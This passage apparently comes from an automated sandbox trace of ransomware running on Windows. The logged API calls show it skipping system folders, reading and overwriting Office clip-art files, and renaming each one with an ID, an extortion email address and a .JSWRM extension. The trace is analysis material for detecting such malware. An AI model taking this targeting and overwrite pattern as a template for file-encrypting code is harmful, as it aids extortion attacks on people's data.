[0086.502] lstrcmpiW (lpString1="J0185774.WMF", lpString2="...") returned 1 [0086.502] lstrcmpiW (lpString1="J0185774.WMF", lpString2="windows") returned -1 [0086.502] lstrcmpiW (lpString1="J0185774.WMF", lpString2="recovery") returned -1 [0086.502] lstrcmpiW (lpString1="J0185774.WMF", lpString2="perflogs") returned -1 [0086.502] lstrcmpiW (lpString1="J0185774.WMF", lpString2="documents and settings") returned 1 [0086.502] lstrcmpiW (lpString1="J0185774.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.502] lstrcmpiW (lpString1="J0185774.WMF", lpString2="system volume information") returned -1 [0086.502] lstrcmpiW (lpString1="J0185774.WMF", lpString2="msocache") returned -1 [0086.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0086.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185774.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185774.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185774.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0086.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0086.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185774.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185774.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185774.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0086.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0086.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0086.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0086.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185774.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185774.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.503] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20038) returned 1 [0086.503] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e40) returned 0x24d210 [0086.503] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4e40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4e40, lpOverlapped=0x0) returned 1 [0086.506] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.506] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4e40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4e40, lpOverlapped=0x0) returned 1 [0086.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.506] CloseHandle (hObject=0x314) returned 1 [0086.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0086.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0086.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0086.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0086.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0086.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0086.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0086.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0086.507] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185774.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185774.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185774.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185774.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0086.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0086.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0086.507] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaefe14, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeaefe14, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb1606f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x69d8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0185776.WMF", cAlternateFileName="")) returned 1 [0086.508] lstrcmpiW (lpString1="J0185776.WMF", lpString2=".") returned 1 [0086.508] lstrcmpiW (lpString1="J0185776.WMF", lpString2="..") returned 1 [0086.508] lstrcmpiW (lpString1="J0185776.WMF", lpString2="...") returned 1 [0086.508] lstrcmpiW (lpString1="J0185776.WMF", lpString2="windows") returned -1 [0086.508] lstrcmpiW (lpString1="J0185776.WMF", lpString2="recovery") returned -1 [0086.508] lstrcmpiW (lpString1="J0185776.WMF", lpString2="perflogs") returned -1 [0086.508] lstrcmpiW (lpString1="J0185776.WMF", lpString2="documents and settings") returned 1 [0086.508] lstrcmpiW (lpString1="J0185776.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.508] lstrcmpiW (lpString1="J0185776.WMF", lpString2="system volume information") returned -1 [0086.508] lstrcmpiW (lpString1="J0185776.WMF", lpString2="msocache") returned -1 [0086.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0086.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185776.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185776.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185776.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0086.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0086.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185776.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185776.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185776.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0086.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0086.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0086.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0086.508] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185776.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185776.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.509] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=27096) returned 1 [0086.509] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x69d0) returned 0x24d210 [0086.509] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x69d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x69d0, lpOverlapped=0x0) returned 1 [0086.513] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.513] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x69d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x69d0, lpOverlapped=0x0) returned 1 [0086.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.513] CloseHandle (hObject=0x314) returned 1 [0086.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0086.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0086.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0086.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0086.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0086.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0086.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.514] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185776.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185776.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185776.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185776.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0086.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0086.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0086.514] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaefe14, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeaefe14, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeaefe14, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x62e0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0185778.WMF", cAlternateFileName="")) returned 1 [0086.515] lstrcmpiW (lpString1="J0185778.WMF", lpString2=".") returned 1 [0086.515] lstrcmpiW (lpString1="J0185778.WMF", lpString2="..") returned 1 [0086.515] lstrcmpiW (lpString1="J0185778.WMF", lpString2="...") returned 1 [0086.515] lstrcmpiW (lpString1="J0185778.WMF", lpString2="windows") returned -1 [0086.515] lstrcmpiW (lpString1="J0185778.WMF", lpString2="recovery") returned -1 [0086.515] lstrcmpiW (lpString1="J0185778.WMF", lpString2="perflogs") returned -1 [0086.515] lstrcmpiW (lpString1="J0185778.WMF", lpString2="documents and settings") returned 1 [0086.515] lstrcmpiW (lpString1="J0185778.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.515] lstrcmpiW (lpString1="J0185778.WMF", lpString2="system volume information") returned -1 [0086.515] lstrcmpiW (lpString1="J0185778.WMF", lpString2="msocache") returned -1 [0086.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0086.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185778.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185778.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185778.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0086.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0086.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185778.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185778.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185778.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0086.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0086.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0086.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0086.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185778.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185778.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.516] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=25312) returned 1 [0086.516] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x62e0) returned 0x24d210 [0086.516] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x62e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x62e0, lpOverlapped=0x0) returned 1 [0086.521] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.521] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x62e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x62e0, lpOverlapped=0x0) returned 1 [0086.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.521] CloseHandle (hObject=0x314) returned 1 [0086.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0086.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0086.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0086.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0086.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0086.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0086.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0086.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0086.522] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185778.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185778.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185778.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185778.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0086.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0086.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0086.523] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaefe14, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeaefe14, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeaefe14, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe956, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0185780.WMF", cAlternateFileName="")) returned 1 [0086.523] lstrcmpiW (lpString1="J0185780.WMF", lpString2=".") returned 1 [0086.523] lstrcmpiW (lpString1="J0185780.WMF", lpString2="..") returned 1 [0086.523] lstrcmpiW (lpString1="J0185780.WMF", lpString2="...") returned 1 [0086.523] lstrcmpiW (lpString1="J0185780.WMF", lpString2="windows") returned -1 [0086.523] lstrcmpiW (lpString1="J0185780.WMF", lpString2="recovery") returned -1 [0086.523] lstrcmpiW (lpString1="J0185780.WMF", lpString2="perflogs") returned -1 [0086.523] lstrcmpiW (lpString1="J0185780.WMF", lpString2="documents and settings") returned 1 [0086.523] lstrcmpiW (lpString1="J0185780.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.523] lstrcmpiW (lpString1="J0185780.WMF", lpString2="system volume information") returned -1 [0086.523] lstrcmpiW (lpString1="J0185780.WMF", lpString2="msocache") returned -1 [0086.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0086.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185780.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185780.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185780.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0086.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0086.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185780.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185780.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185780.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0086.524] RtlAllocateHeap 